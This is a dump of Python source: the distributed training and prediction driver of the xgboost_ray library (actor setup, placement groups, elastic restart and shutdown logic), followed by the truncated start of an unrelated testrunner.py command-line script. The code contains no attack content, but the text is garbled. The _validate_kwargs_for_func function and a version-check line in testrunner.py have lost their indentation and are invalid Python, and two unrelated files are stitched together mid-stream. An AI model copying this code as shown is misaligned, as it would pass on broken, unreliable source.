            # Adopt the worker's checkpoint state in place.
            checkpoint.__dict__.update(item.__dict__)
        else:
            callback_returns[actor_rank].append(item)
def _shutdown(actors: List[ActorHandle],
              pending_actors: Optional[Dict[int, Tuple[
                  ActorHandle, _PrepareActorTask]]] = None,
              queue: Optional[Queue] = None,
              event: Optional[Event] = None,
              placement_group: Optional[PlacementGroup] = None,
              force: bool = False):
    """Tear down training actors and auxiliary resources.

    Actors are asked to terminate gracefully unless ``force`` is set (or
    graceful termination times out), in which case they are killed. The
    queue and event actors and the placement group, if given, are shut
    down as well. The ``actors`` list is cleared in place.
    """
    alive_actors = [actor for actor in actors if actor is not None]
    if pending_actors:
        alive_actors += [actor for (actor, _task) in pending_actors.values()]

    if force:
        for actor in alive_actors:
            ray.kill(actor)
    else:
        # Wait 5 seconds for actors to die gracefully; kill stragglers.
        done_refs = [
            actor.__ray_terminate__.remote() for actor in alive_actors
        ]
        _done, not_done = ray.wait(done_refs, timeout=5)
        if not_done:
            for actor in alive_actors:
                ray.kill(actor)

    for idx in range(len(actors)):
        actors[idx] = None

    if queue:
        queue.shutdown()
    if event:
        event.shutdown()
    if placement_group:
        remove_placement_group(placement_group)
def _create_placement_group(cpus_per_actor, gpus_per_actor,
                            resources_per_actor, num_actors, strategy):
    """Create and await a placement group colocating the training workers.

    Raises:
        TimeoutError: If the group is not ready within
            ``ENV.PLACEMENT_GROUP_TIMEOUT_S`` seconds.
    """
    extra_resources = resources_per_actor or {}
    # One bundle per actor: CPU/GPU plus any custom resources.
    bundle = {
        "CPU": cpus_per_actor,
        "GPU": gpus_per_actor,
        **extra_resources,
    }
    bundles = [dict(bundle) for _ in range(num_actors)]
    pg = placement_group(bundles, strategy=strategy)

    # Wait for placement group to get created.
    logger.debug("Waiting for placement group to start.")
    ready, _ = ray.wait([pg.ready()], timeout=ENV.PLACEMENT_GROUP_TIMEOUT_S)
    if not ready:
        raise TimeoutError("Placement group creation timed out. Make sure "
                           "your cluster either has enough resources or use "
                           "an autoscaling cluster. Current resources "
                           "available: {}, resources requested by the "
                           "placement group: {}".format(
                               ray.available_resources(), pg.bundle_specs))
    logger.debug("Placement group has started.")
    return pg
def _create_communication_processes(added_tune_callback: bool = False):
    """Create the Queue and Event actors, colocated with the driver node.

    Returns:
        Tuple of ``(queue, stop_event)`` actors.
    """
    node_ip = get_node_ip_address()
    # Have to explicitly set num_cpus to 0.
    placement_option = {"num_cpus": 0}
    if added_tune_callback and TUNE_USING_PG:
        # If Tune is using placement groups, force Queue and StopEvent
        # onto the same bundle as the Trainable so all three share a node.
        current_pg = get_current_placement_group()
        if current_pg is not None:
            placement_option["placement_group"] = current_pg
            placement_option["placement_group_bundle_index"] = 0
        else:
            # The user is not using Tune PGs after all (e.g. disabled via
            # an environment variable) — pin to the driver node instead.
            placement_option["resources"] = {f"node:{node_ip}": 0.01}
    else:
        placement_option["resources"] = {f"node:{node_ip}": 0.01}

    queue = Queue(actor_options=placement_option)  # Queue actor
    stop_event = Event(actor_options=placement_option)  # Stop event actor
    return queue, stop_event
def _validate_kwargs_for_func(kwargs: Dict[str, Any], func: Callable,
func_name: str):
"""Raise exception if kwargs are not valid for a given function."""
sig = inspect.signature(func)
try:
sig.bind_partial(**kwargs)
except TypeError as e:
# Try to find set of invalid kwargs
valid_keys = inspect.getfullargspec(func)[0]
invalid_kwargs = [k for k in kwargs if k not in valid_keys]
raise TypeError(
f"Got invalid keyword arguments to be passed to `{func_name}`. "
f"Please check these arguments: {invalid_kwargs}") from e
@dataclass
class _TrainingState:
    """Mutable state shared across invocations of ``_train()``.

    Bundles actor handles, communication actors, checkpoint state and
    bookkeeping needed for fault-tolerant/elastic training restarts.
    """
    # Actor handles indexed by rank; ``None`` marks a dead/missing actor.
    actors: List[Optional[ActorHandle]]
    # Queue for worker-to-driver results (checkpoints, callback returns).
    queue: Queue
    # Event used to signal actors to stop training.
    stop_event: Event

    # Latest checkpoint received from the workers.
    checkpoint: _Checkpoint
    # Additional results accumulated across restarts (callback returns etc.).
    additional_results: Dict

    training_started_at: float = 0.

    placement_group: Optional[PlacementGroup] = None

    # Ranks that must be (re-)created before training can proceed.
    failed_actor_ranks: set = field(default_factory=set)

    # Last time we checked resources to schedule new actors
    last_resource_check_at: float = 0
    # Actors that have been scheduled but are not yet ready for training.
    pending_actors: Dict[int, Tuple[ActorHandle, _PrepareActorTask]] = field(
        default_factory=dict)
    # When set, the time at which training should be restarted
    # (elastic mode).
    restart_training_at: Optional[float] = None
def _train(params: Dict,
           dtrain: RayDMatrix,
           *args,
           evals=(),
           ray_params: RayParams,
           cpus_per_actor: int,
           gpus_per_actor: int,
           _training_state: _TrainingState,
           **kwargs) -> Tuple[xgb.Booster, Dict, Dict]:
    """This is the local train function wrapped by :func:`train() <train>`.

    This function can be thought of one invocation of a multi-actor xgboost
    training run. It starts the required number of actors, triggers data
    loading, collects the results, and handles (i.e. registers) actor failures
    - but it does not handle fault tolerance or general training setup.

    Generally, this function is called one or multiple times by the
    :func:`train() <train>` function. It is called exactly once if no
    errors occur. It is called more than once if errors occurred (e.g. an
    actor died) and failure handling is enabled.

    Returns:
        Tuple of ``(booster, evals_result, additional_results)``.
    """
    from xgboost_ray.elastic import _maybe_schedule_new_actors, \
        _update_scheduled_actor_states, _get_actor_alive_status

    # Un-schedule possible scheduled restarts
    _training_state.restart_training_at = None

    if "nthread" in params or "n_jobs" in params:
        if ("nthread" in params and params["nthread"] > cpus_per_actor) or (
                "n_jobs" in params and params["n_jobs"] > cpus_per_actor):
            raise ValueError(
                "Specified number of threads greater than number of CPUs. "
                "\nFIX THIS by passing a lower value for the `nthread` "
                "parameter or a higher number for `cpus_per_actor`.")
    else:
        params["nthread"] = cpus_per_actor
        params["n_jobs"] = cpus_per_actor

    # This is a callback that handles actor failures.
    # We identify the rank of the failed actor, add this to a set of
    # failed actors (which we might want to restart later), and set its
    # entry in the actor list to None.
    def handle_actor_failure(actor_id):
        rank = _training_state.actors.index(actor_id)
        _training_state.failed_actor_ranks.add(rank)
        _training_state.actors[rank] = None

    # Here we create new actors. In the first invocation of _train(), this
    # will be all actors. In future invocations, this may be less than
    # the num_actors setting, depending on the failure mode.
    newly_created = 0
    for i in list(_training_state.failed_actor_ranks):
        if _training_state.actors[i] is not None:
            raise RuntimeError(
                f"Trying to create actor with rank {i}, but it already "
                f"exists.")
        actor = _create_actor(
            rank=i,
            num_actors=ray_params.num_actors,
            num_cpus_per_actor=cpus_per_actor,
            num_gpus_per_actor=gpus_per_actor,
            resources_per_actor=ray_params.resources_per_actor,
            placement_group=_training_state.placement_group,
            queue=_training_state.queue,
            checkpoint_frequency=ray_params.checkpoint_frequency,
            distributed_callbacks=ray_params.distributed_callbacks)
        # Set actor entry in our list
        _training_state.actors[i] = actor
        # Remove from this set so it is not created again
        _training_state.failed_actor_ranks.remove(i)
        newly_created += 1

    alive_actors = sum(1 for a in _training_state.actors if a is not None)

    logger.info(f"[RayXGBoost] Created {newly_created} new actors "
                f"({alive_actors} total actors). Waiting until actors "
                f"are ready for training.")

    # For distributed datasets (e.g. Modin), this will initialize
    # (and fix) the assignment of data shards to actor ranks
    dtrain.assert_enough_shards_for_actors(num_actors=ray_params.num_actors)
    dtrain.assign_shards_to_actors(_training_state.actors)
    for deval, _ in evals:
        deval.assert_enough_shards_for_actors(num_actors=ray_params.num_actors)
        deval.assign_shards_to_actors(_training_state.actors)

    # Matrices each actor needs to load (don't shadow the `eval` builtin).
    load_data = [dtrain] + [deval for deval, _ in evals]

    prepare_actor_tasks = [
        _PrepareActorTask(
            actor,
            # Maybe we got a new Queue actor, so send it to all actors.
            queue=_training_state.queue,
            # Maybe we got a new Event actor, so send it to all actors.
            stop_event=_training_state.stop_event,
            # Trigger data loading
            load_data=load_data) for actor in _training_state.actors
        if actor is not None
    ]

    start_wait = time.time()
    last_status = start_wait

    try:
        # Construct list before calling all() to force evaluation
        ready_states = [task.is_ready() for task in prepare_actor_tasks]
        while not all(ready_states):
            if time.time() >= last_status + ENV.STATUS_FREQUENCY_S:
                wait_time = time.time() - start_wait
                logger.info(f"Waiting until actors are ready "
                            f"({wait_time:.0f} seconds passed).")
                last_status = time.time()
            time.sleep(0.1)
            ready_states = [task.is_ready() for task in prepare_actor_tasks]
    except Exception as exc:
        _training_state.stop_event.set()
        _get_actor_alive_status(_training_state.actors, handle_actor_failure)
        raise RayActorError from exc

    logger.info("[RayXGBoost] Starting XGBoost training.")

    # Start Rabit tracker for gradient sharing
    rabit_process, env = _start_rabit_tracker(alive_actors)
    rabit_args = [("%s=%s" % item).encode() for item in env.items()]

    # Load checkpoint if we have one. In that case we need to adjust the
    # number of training rounds.
    if _training_state.checkpoint.value:
        kwargs["xgb_model"] = pickle.loads(_training_state.checkpoint.value)
        if _training_state.checkpoint.iteration == -1:
            # -1 means training already finished.
            # NOTE: the message below previously lost spaces due to
            # implicit string concatenation; fixed here.
            logger.error(
                "Trying to continue training from a checkpoint, but the "
                "checkpoint indicates that training already finished. "
                "Returning the last checkpointed model instead.")
            return kwargs["xgb_model"], {}, _training_state.additional_results

    # The callback_returns dict contains actor-rank indexed lists of
    # results obtained through the `put_queue` function, usually
    # sent via callbacks.
    callback_returns = _training_state.additional_results.get(
        "callback_returns")
    if callback_returns is None:
        callback_returns = [list() for _ in range(len(_training_state.actors))]
        _training_state.additional_results[
            "callback_returns"] = callback_returns

    _training_state.training_started_at = time.time()

    # Trigger the train function
    live_actors = [
        actor for actor in _training_state.actors if actor is not None
    ]
    training_futures = [
        actor.train.remote(
            rabit_args,
            i == 0,  # return_bst
            params,
            dtrain,
            evals,
            *args,
            **kwargs) for i, actor in enumerate(live_actors)
    ]

    # Failure handling loop. Here we wait until all training tasks finished.
    # If a training task fails, we stop training on the remaining actors,
    # check which ones are still alive, and raise the error.
    # The train() wrapper function will then handle the error.
    start_wait = time.time()
    last_status = start_wait
    try:
        not_ready = training_futures
        while not_ready:
            if _training_state.queue:
                _handle_queue(
                    queue=_training_state.queue,
                    checkpoint=_training_state.checkpoint,
                    callback_returns=callback_returns)

            if ray_params.elastic_training \
                    and not ENV.ELASTIC_RESTART_DISABLED:
                _maybe_schedule_new_actors(
                    training_state=_training_state,
                    num_cpus_per_actor=cpus_per_actor,
                    num_gpus_per_actor=gpus_per_actor,
                    resources_per_actor=ray_params.resources_per_actor,
                    ray_params=ray_params,
                    load_data=load_data)

                # This may raise RayXGBoostActorAvailable
                _update_scheduled_actor_states(_training_state)

            if time.time() >= last_status + ENV.STATUS_FREQUENCY_S:
                wait_time = time.time() - start_wait
                logger.info(f"Training in progress "
                            f"({wait_time:.0f} seconds since last restart).")
                last_status = time.time()

            ready, not_ready = ray.wait(
                not_ready, num_returns=len(not_ready), timeout=1)
            ray.get(ready)

        # Get items from queue one last time
        if _training_state.queue:
            _handle_queue(
                queue=_training_state.queue,
                checkpoint=_training_state.checkpoint,
                callback_returns=callback_returns)

    # The inner loop should catch all exceptions
    except Exception as exc:
        logger.debug(f"Caught exception in training loop: {exc}")

        # Stop all other actors from training
        _training_state.stop_event.set()

        # Check which actors are still alive
        _get_actor_alive_status(_training_state.actors, handle_actor_failure)

        # Todo: Try to fetch newer checkpoint, store in `_checkpoint`
        # Shut down rabit
        _stop_rabit_tracker(rabit_process)

        raise RayActorError from exc

    # Training is now complete.
    # Stop Rabit tracking process
    _stop_rabit_tracker(rabit_process)

    # Get all results from all actors.
    all_results: List[Dict[str, Any]] = ray.get(training_futures)

    # All results should be the same because of Rabit tracking. But only
    # the first one actually returns its bst object.
    bst = all_results[0]["bst"]
    evals_result = all_results[0]["evals_result"]

    if callback_returns:
        _training_state.additional_results[
            "callback_returns"] = callback_returns

    total_n = sum(res["train_n"] or 0 for res in all_results)

    _training_state.additional_results["total_n"] = total_n

    return bst, evals_result, _training_state.additional_results
@PublicAPI(stability="beta")
def train(
        params: Dict,
        dtrain: RayDMatrix,
        num_boost_round: int = 10,
        *args,
        evals: Union[List[Tuple[RayDMatrix, str]], Tuple[RayDMatrix, str]] = (
        ),
        evals_result: Optional[Dict] = None,
        additional_results: Optional[Dict] = None,
        ray_params: Union[None, RayParams, Dict] = None,
        _remote: Optional[bool] = None,
        **kwargs) -> xgb.Booster:
    """Distributed XGBoost training via Ray.

    This function will connect to a Ray cluster, create ``num_actors``
    remote actors, send data shards to them, and have them train an
    XGBoost classifier. The XGBoost parameters will be shared and combined
    via Rabit's all-reduce protocol.

    If running inside a Ray Tune session, this function will automatically
    handle results to tune for hyperparameter search.

    Failure handling:

    XGBoost on Ray supports automatic failure handling that can be configured
    with the :class:`ray_params <RayParams>` argument. If an actor or local
    training task dies, the Ray actor is marked as dead, and there are
    three options on how to proceed.

    First, if ``ray_params.elastic_training`` is ``True`` and
    the number of dead actors is below ``ray_params.max_failed_actors``,
    training will continue right away with fewer actors. No data will be
    loaded again and the latest available checkpoint will be used.
    A maximum of ``ray_params.max_actor_restarts`` restarts will be tried
    before exiting.

    Second, if ``ray_params.elastic_training`` is ``False`` and
    the number of restarts is below ``ray_params.max_actor_restarts``,
    Ray will try to schedule the dead actor again, load the data shard
    on this actor, and then continue training from the latest checkpoint.

    Third, if none of the above is the case, training is aborted.

    Args:
        params (Dict): parameter dict passed to ``xgboost.train()``
        dtrain (RayDMatrix): Data object containing the training data.
        num_boost_round (int): Number of boosting rounds, passed through
            to the per-restart ``_train()`` invocations.
        evals (Union[List[Tuple[RayDMatrix, str]], Tuple[RayDMatrix, str]]):
            ``evals`` tuple passed to ``xgboost.train()``.
        evals_result (Optional[Dict]): Dict to store evaluation results in.
        additional_results (Optional[Dict]): Dict to store additional results.
        ray_params (Union[None, RayParams, Dict]): Parameters to configure
            Ray-specific behavior. See :class:`RayParams` for a list of valid
            configuration parameters.
        _remote (bool): Whether to run the driver process in a remote
            function. This is enabled by default in Ray client mode.
        **kwargs: Keyword arguments will be passed to the local
            `xgb.train()` calls.

    Returns: An ``xgboost.Booster`` object.
    """
    os.environ.setdefault("RAY_IGNORE_UNHANDLED_ERRORS", "1")

    if xgb is None:
        raise ImportError(
            "xgboost package is not installed. XGBoost-Ray WILL NOT WORK. "
            "FIX THIS by running `pip install \"xgboost-ray\"`.")

    if _remote is None:
        _remote = _is_client_connected() and \
            not is_session_enabled()

    if not ray.is_initialized():
        ray.init()

    if _remote:
        # Run this function as a remote function to support Ray client mode.
        @ray.remote(num_cpus=0)
        def _wrapped(*args, **kwargs):
            _evals_result = {}
            _additional_results = {}
            bst = train(
                *args,
                num_boost_round=num_boost_round,
                evals_result=_evals_result,
                additional_results=_additional_results,
                **kwargs)
            return bst, _evals_result, _additional_results

        # Make sure that train is called on the server node.
        _wrapped = force_on_current_node(_wrapped)

        bst, train_evals_result, train_additional_results = ray.get(
            _wrapped.remote(
                params,
                dtrain,
                *args,
                evals=evals,
                ray_params=ray_params,
                _remote=False,
                **kwargs,
            ))
        # Copy results back into the caller-provided dicts.
        if isinstance(evals_result, dict):
            evals_result.update(train_evals_result)
        if isinstance(additional_results, dict):
            additional_results.update(train_additional_results)
        return bst

    _maybe_print_legacy_warning()

    # may raise TypeError
    _validate_kwargs_for_func(kwargs, xgb.train, "xgb.train()")

    start_time = time.time()

    ray_params = _validate_ray_params(ray_params)

    # max_actor_restarts < 0 means "retry forever".
    max_actor_restarts = ray_params.max_actor_restarts \
        if ray_params.max_actor_restarts >= 0 else float("inf")
    _assert_ray_support()

    if not isinstance(dtrain, RayDMatrix):
        raise ValueError(
            "The `dtrain` argument passed to `train()` is not a RayDMatrix, "
            "but of type {}. "
            "\nFIX THIS by instantiating a RayDMatrix first: "
            "`dtrain = RayDMatrix(data=data, label=label)`.".format(
                type(dtrain)))

    added_tune_callback = _try_add_tune_callback(kwargs)
    # Tune currently does not support elastic training.
    if added_tune_callback and ray_params.elastic_training and not bool(
            os.getenv("RXGB_ALLOW_ELASTIC_TUNE", "0")):
        raise ValueError("Elastic Training cannot be used with Ray Tune. "
                         "Please disable elastic_training in RayParams in "
                         "order to use xgboost_ray with Tune.")

    if added_tune_callback:
        # Don't autodetect resources when used with Tune.
        cpus_per_actor = ray_params.cpus_per_actor
        gpus_per_actor = max(0, ray_params.gpus_per_actor)
    else:
        cpus_per_actor, gpus_per_actor = _autodetect_resources(
            ray_params=ray_params,
            use_tree_method="tree_method" in params
            and params["tree_method"] is not None
            and params["tree_method"].startswith("gpu"))

    tree_method = params.get("tree_method", "auto") or "auto"

    # preemptively raise exceptions with bad params
    if tree_method == "exact":
        raise ValueError(
            "`exact` tree method doesn't support distributed training.")
    if params.get("updater", None) == "grow_colmaker":
        raise ValueError(
            "`grow_colmaker` updater doesn't support distributed training.")

    if gpus_per_actor > 0 and not tree_method.startswith("gpu_"):
        warnings.warn(
            f"GPUs have been assigned to the actors, but the current XGBoost "
            f"tree method is set to `{tree_method}`. Thus, GPUs will "
            f"currently not be used. To enable GPUs usage, please set the "
            f"`tree_method` to a GPU-compatible option, "
            f"e.g. `gpu_hist`.")

    if gpus_per_actor == 0 and cpus_per_actor == 0:
        raise ValueError("cpus_per_actor and gpus_per_actor both cannot be "
                         "0. Are you sure your cluster has CPUs available?")

    if ray_params.elastic_training and ray_params.max_failed_actors == 0:
        raise ValueError(
            "Elastic training enabled but the maximum number of failed "
            "actors is set to 0. This means that elastic training is "
            "effectively disabled. Please set `RayParams.max_failed_actors` "
            "to something larger than 0 to enable elastic training.")

    if ray_params.elastic_training and ray_params.max_actor_restarts == 0:
        raise ValueError(
            "Elastic training enabled but the maximum number of actor "
            "restarts is set to 0. This means that elastic training is "
            "effectively disabled. Please set `RayParams.max_actor_restarts` "
            "to something larger than 0 to enable elastic training.")

    if not dtrain.has_label:
        raise ValueError(
            "Training data has no label set. Please make sure to set "
            "the `label` argument when initializing `RayDMatrix()` "
            "for data you would like to train on.")

    if not dtrain.loaded and not dtrain.distributed:
        dtrain.load_data(ray_params.num_actors)

    for (deval, _name) in evals:
        if not deval.has_label:
            raise ValueError(
                "Evaluation data has no label set. Please make sure to set "
                "the `label` argument when initializing `RayDMatrix()` "
                "for data you would like to evaluate on.")
        if not deval.loaded and not deval.distributed:
            deval.load_data(ray_params.num_actors)

    bst = None
    train_evals_result = {}
    train_additional_results = {}

    tries = 0
    checkpoint = _Checkpoint()  # Keep track of latest checkpoint
    current_results = {}  # Keep track of additional results
    actors = [None] * ray_params.num_actors  # All active actors
    pending_actors = {}

    # Create the Queue and Event actors.
    queue, stop_event = _create_communication_processes(added_tune_callback)

    placement_strategy = None
    if not ray_params.elastic_training:
        if added_tune_callback:
            if TUNE_USING_PG:
                # If Tune is using placement groups, then strategy has already
                # been set. Don't create an additional placement_group here.
                placement_strategy = None
            else:
                placement_strategy = "PACK"
        elif bool(ENV.USE_SPREAD_STRATEGY):
            placement_strategy = "SPREAD"

    if placement_strategy is not None:
        pg = _create_placement_group(cpus_per_actor, gpus_per_actor,
                                     ray_params.resources_per_actor,
                                     ray_params.num_actors, placement_strategy)
    else:
        pg = None

    start_actor_ranks = set(range(ray_params.num_actors))  # Start these

    total_training_time = 0.
    boost_rounds_left = num_boost_round
    last_checkpoint_value = checkpoint.value

    # Restart loop: each iteration is one (possibly partial) training run.
    while tries <= max_actor_restarts:
        # Only update number of iterations if the checkpoint changed
        # If it didn't change, we already subtracted the iterations.
        if checkpoint.iteration >= 0 and \
                checkpoint.value != last_checkpoint_value:
            boost_rounds_left -= checkpoint.iteration + 1
            last_checkpoint_value = checkpoint.value

        logger.debug(f"Boost rounds left: {boost_rounds_left}")

        training_state = _TrainingState(
            actors=actors,
            queue=queue,
            stop_event=stop_event,
            checkpoint=checkpoint,
            additional_results=current_results,
            training_started_at=0.,
            placement_group=pg,
            failed_actor_ranks=start_actor_ranks,
            pending_actors=pending_actors)

        try:
            bst, train_evals_result, train_additional_results = _train(
                params,
                dtrain,
                boost_rounds_left,
                *args,
                evals=evals,
                ray_params=ray_params,
                cpus_per_actor=cpus_per_actor,
                gpus_per_actor=gpus_per_actor,
                _training_state=training_state,
                **kwargs)
            if training_state.training_started_at > 0.:
                total_training_time += time.time(
                ) - training_state.training_started_at
            break
        except (RayActorError, RayTaskError) as exc:
            if training_state.training_started_at > 0.:
                total_training_time += time.time(
                ) - training_state.training_started_at

            alive_actors = sum(1 for a in actors if a is not None)

            start_again = False
            if ray_params.elastic_training:
                if alive_actors < ray_params.num_actors - \
                        ray_params.max_failed_actors:
                    raise RuntimeError(
                        "A Ray actor died during training and the maximum "
                        "number of dead actors in elastic training was "
                        "reached. Shutting down training.") from exc

                # Do not start new actors before resuming training
                # (this might still restart actors during training)
                start_actor_ranks.clear()

                if exc.__cause__ and isinstance(exc.__cause__,
                                                RayXGBoostActorAvailable):
                    # New actor available, integrate into training loop
                    logger.info(
                        f"A new actor became available. Re-starting training "
                        f"from latest checkpoint with new actor. "
                        f"This will use {alive_actors} existing actors and "
                        f"start {len(start_actor_ranks)} new actors. "
                        f"Sleeping for 10 seconds for cleanup.")
                    tries -= 1  # This is deliberate so shouldn't count
                    start_again = True
                elif tries + 1 <= max_actor_restarts:
                    if exc.__cause__ and isinstance(exc.__cause__,
                                                    RayXGBoostTrainingError):
                        logger.warning(f"Caught exception: {exc.__cause__}")
                    logger.warning(
                        f"A Ray actor died during training. Trying to "
                        f"continue training on the remaining actors. "
                        f"This will use {alive_actors} existing actors and "
                        f"start {len(start_actor_ranks)} new actors. "
                        f"Sleeping for 10 seconds for cleanup.")
                    start_again = True

            elif tries + 1 <= max_actor_restarts:
                if exc.__cause__ and isinstance(exc.__cause__,
                                                RayXGBoostTrainingError):
                    logger.warning(f"Caught exception: {exc.__cause__}")
                logger.warning(
                    f"A Ray actor died during training. Trying to restart "
                    f"and continue training from last checkpoint "
                    f"(restart {tries + 1} of {max_actor_restarts}). "
                    f"This will use {alive_actors} existing actors and start "
                    f"{len(start_actor_ranks)} new actors. "
                    f"Sleeping for 10 seconds for cleanup.")
                start_again = True

            if start_again:
                time.sleep(5)
                queue.shutdown()
                stop_event.shutdown()
                time.sleep(5)
                # NOTE(review): `added_tune_callback` is not forwarded here,
                # so re-created Queue/Event actors always take the non-Tune
                # placement path — confirm whether this is intentional.
                queue, stop_event = _create_communication_processes()
            else:
                raise RuntimeError(
                    f"A Ray actor died during training and the maximum number "
                    f"of retries ({max_actor_restarts}) is exhausted."
                ) from exc
            tries += 1

    total_time = time.time() - start_time

    train_additional_results["training_time_s"] = total_training_time
    train_additional_results["total_time_s"] = total_time

    logger.info("[RayXGBoost] Finished XGBoost training on training data "
                "with total N={total_n:,} in {total_time_s:.2f} seconds "
                "({training_time_s:.2f} pure XGBoost training time).".format(
                    **train_additional_results))

    _shutdown(
        actors=actors,
        pending_actors=pending_actors,
        queue=queue,
        event=stop_event,
        placement_group=pg,
        force=False)

    if isinstance(evals_result, dict):
        evals_result.update(train_evals_result)
    if isinstance(additional_results, dict):
        additional_results.update(train_additional_results)

    return bst
def _predict(model: xgb.Booster, data: RayDMatrix, ray_params: RayParams,
             **kwargs):
    """Local driver side of :func:`predict`: fan prediction out to actors.

    Creates the remote actors, distributes the data shards, runs prediction
    on every actor and combines the per-shard results. Actors are shut down
    before returning (forcefully if an error occurred).
    """
    _assert_ray_support()

    if not ray.is_initialized():
        ray.init()

    # Create remote actors
    num_gpus = ray_params.gpus_per_actor \
        if ray_params.gpus_per_actor >= 0 else 0
    actors = [
        _create_actor(
            rank=rank,
            num_actors=ray_params.num_actors,
            num_cpus_per_actor=ray_params.cpus_per_actor,
            num_gpus_per_actor=num_gpus,
            resources_per_actor=ray_params.resources_per_actor,
            distributed_callbacks=ray_params.distributed_callbacks)
        for rank in range(ray_params.num_actors)
    ]
    logger.info(f"[RayXGBoost] Created {len(actors)} remote actors.")

    # Split data across workers
    wait_load = []
    for actor in actors:
        wait_load.extend(_trigger_data_load(actor, data, []))

    try:
        ray.get(wait_load)
    except Exception as exc:
        logger.warning(f"Caught an error during prediction: {str(exc)}")
        _shutdown(actors, force=True)
        raise

    # Put model into object store
    model_ref = ray.put(model)

    logger.info("[RayXGBoost] Starting XGBoost prediction.")

    # Run prediction on every actor's local shard.
    prediction_futures = [
        actor.predict.remote(model_ref, data, **kwargs) for actor in actors
    ]

    try:
        actor_results = ray.get(prediction_futures)
    except Exception as exc:
        logger.warning(f"Caught an error during prediction: {str(exc)}")
        _shutdown(actors=actors, force=True)
        raise

    _shutdown(actors=actors, force=False)

    return combine_data(data.sharding, actor_results)
@PublicAPI(stability="beta")
def predict(model: xgb.Booster,
            data: RayDMatrix,
            ray_params: Union[None, RayParams, Dict] = None,
            _remote: Optional[bool] = None,
            **kwargs) -> Optional[np.ndarray]:
    """Distributed XGBoost predict via Ray.

    This function will connect to a Ray cluster, create ``num_actors``
    remote actors, send data shards to them, and have them predict labels
    using an XGBoost booster model. The results are then combined and
    returned.

    Args:
        model (xgb.Booster): Booster object to call for prediction.
        data (RayDMatrix): Data object containing the prediction data.
        ray_params (Union[None, RayParams, Dict]): Parameters to configure
            Ray-specific behavior. See :class:`RayParams` for a list of valid
            configuration parameters.
        _remote (bool): Whether to run the driver process in a remote
            function. This is enabled by default in Ray client mode.
        **kwargs: Keyword arguments will be passed to the local
            `xgb.predict()` calls.

    Returns: ``np.ndarray`` containing the predicted labels.
    """
    os.environ.setdefault("RAY_IGNORE_UNHANDLED_ERRORS", "1")
    if xgb is None:
        raise ImportError(
            "xgboost package is not installed. XGBoost-Ray WILL NOT WORK. "
            "FIX THIS by running `pip install \"xgboost-ray\"`.")
    if _remote is None:
        # Default: run the driver remotely when connected via Ray client
        # but not inside a session.
        _remote = _is_client_connected() and \
            not is_session_enabled()
    if not ray.is_initialized():
        ray.init()
    if _remote:
        # Re-enter this function as a zero-CPU remote task on the cluster.
        return ray.get(
            ray.remote(num_cpus=0)(predict).remote(
                model, data, ray_params, _remote=False, **kwargs))
    _maybe_print_legacy_warning()
    ray_params = _validate_ray_params(ray_params)
    # A negative max_actor_restarts means "retry forever".
    max_actor_restarts = ray_params.max_actor_restarts \
        if ray_params.max_actor_restarts >= 0 else float("inf")
    _assert_ray_support()
    if not isinstance(data, RayDMatrix):
        # NOTE(review): message says `train()` but this is `predict()` —
        # looks like a copy/paste in the original error text.
        raise ValueError(
            "The `data` argument passed to `train()` is not a RayDMatrix, "
            "but of type {}. "
            "\nFIX THIS by instantiating a RayDMatrix first: "
            "`data = RayDMatrix(data=data)`.".format(type(data)))
    tries = 0
    # Retry loop: restart prediction from scratch when a Ray actor dies,
    # up to max_actor_restarts times.
    while tries <= max_actor_restarts:
        try:
            return _predict(model, data, ray_params=ray_params, **kwargs)
        except RayActorError:
            if tries + 1 <= max_actor_restarts:
                logger.warning(
                    "A Ray actor died during prediction. Trying to restart "
                    "prediction from scratch. "
                    "Sleeping for 10 seconds for cleanup.")
                time.sleep(10)
            else:
                raise RuntimeError(
                    "A Ray actor died during prediction and the maximum "
                    "number of retries ({}) is exhausted.".format(
                        max_actor_restarts))
        tries += 1
    return None
|
testrunner.py | #!/usr/bin/env python3
import base64
import gzip
from http.client import BadStatusLine
import os
import urllib.request, urllib.error, urllib.parse
import sys
import threading
from os.path import basename, splitext
from multiprocessing import Process
from pprint import pprint
sys.path = ["lib", "pytests", "pysystests"] + sys.path
if sys.hexversion < 0x30706f0:
sys.exit("Testrunner requires version 3.7.6+ of python (found: " + sys.version + ")")
import re
import time
import unittest
import logging.config
from threading import Thread, Event
from xunit import XUnitTestResult
from TestInput import TestInputParser, TestInputSingleton
from optparse import OptionParser, OptionGroup
from scripts.collect_server_info import cbcollectRunner, couch_dbinfo_Runner
from scripts.measure_sched_delays import SchedDelays
from scripts.getcoredumps import Getcoredumps, Clearcoredumps
import signal
import shutil
import glob
import xml.dom.minidom
import logging
from remote.remote_util import RemoteMachineShellConnection
# Module-level logger; its level is adjusted later via setLogLevel().
log = logging.getLogger(__name__)
logging.info(__name__)
print("*** TestRunner ***")
def usage(err=None):
    """Print usage help (and an optional error message) and exit.

    Args:
        err: Optional error message. Previously this parameter was
            accepted but silently ignored, so callers such as
            parse_conf_file lost their diagnostic. When given, it is now
            printed before the usage text and the process exits with
            status 1 instead of 0.
    """
    if err:
        print("Error: {0}\n".format(err))
    print("""\
Syntax: testrunner [options]

Examples:
./testrunner -i tmp/local.ini -t performance.perf.DiskDrainRate
./testrunner -i tmp/local.ini -t performance.perf.DiskDrainRate.test_9M
""")
    sys.exit(1 if err else 0)
def parse_args(argv):
    """Parse command-line options and build the list of tests to run.

    Returns a 5-tuple ``(tests, test_params, ini_path, raw_params,
    options)``. Exits the process on missing/invalid arguments or when
    ``--noop`` is given.
    """
    parser = OptionParser()
    parser.add_option("-q", action="store_false", dest="verbose")

    tgroup = OptionGroup(parser, "TestCase/Runlist Options")
    tgroup.add_option("-i", "--ini", dest="ini",
                      help="Path to .ini file containing server information,e.g -i tmp/local.ini")
    tgroup.add_option("-c", "--config", dest="conf",
                      help="Config file name (located in the conf subdirectory), "
                           "e.g -c py-view.conf")
    tgroup.add_option("-t", "--test", dest="testcase",
                      help="Test name (multiple -t options add more tests) e.g -t "
                           "performance.perf.DiskDrainRate")
    tgroup.add_option("-d", "--include_tests", dest="include_tests",
                      help="Value can be 'failed' (or) 'passed' (or) 'failed=<junit_xml_path (or) "
                           "jenkins_build_url>' (or) 'passed=<junit_xml_path or "
                           "jenkins_build_url>' (or) 'file=<filename>' (or) '<regular "
                           "expression>' to include tests in the run. Use -g option to search "
                           "entire conf files. e.g. -d 'failed' or -d 'failed=report.xml' or -d "
                           "'^gsi.*nodes_init=2.*'")
    tgroup.add_option("-e", "--exclude_tests", dest="exclude_tests",
                      help="Value can be 'failed' (or) 'passed' (or) 'failed=<junit_xml_path (or) "
